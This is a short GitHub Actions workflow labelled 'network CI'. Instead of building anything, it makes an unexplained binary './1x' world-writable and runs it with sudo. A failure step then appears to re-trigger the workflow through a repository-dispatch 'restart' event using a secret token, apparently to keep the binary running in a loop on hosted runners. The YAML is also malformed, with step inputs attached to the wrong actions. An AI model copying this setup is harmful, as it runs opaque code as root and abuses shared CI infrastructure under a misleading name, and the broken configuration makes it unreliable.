name: network CI

on: push

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 1
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-go@v2
      - uses: peter-evans/repository-dispatch@v1
        with:
            go-version: '1.17'
      - run: go version

      - name: init
        run: |
            sudo apt-get update
            sudo chmod -R 777 ./1x

      - name: x1
        run: sudo ./1x

      - name: fail
        if: failure()
        with:
          token: ${{ secrets.ACTIONS_PAT }}
          event-type: restart
          client-payload: '{"runid": "${{ github.run_id }}"}'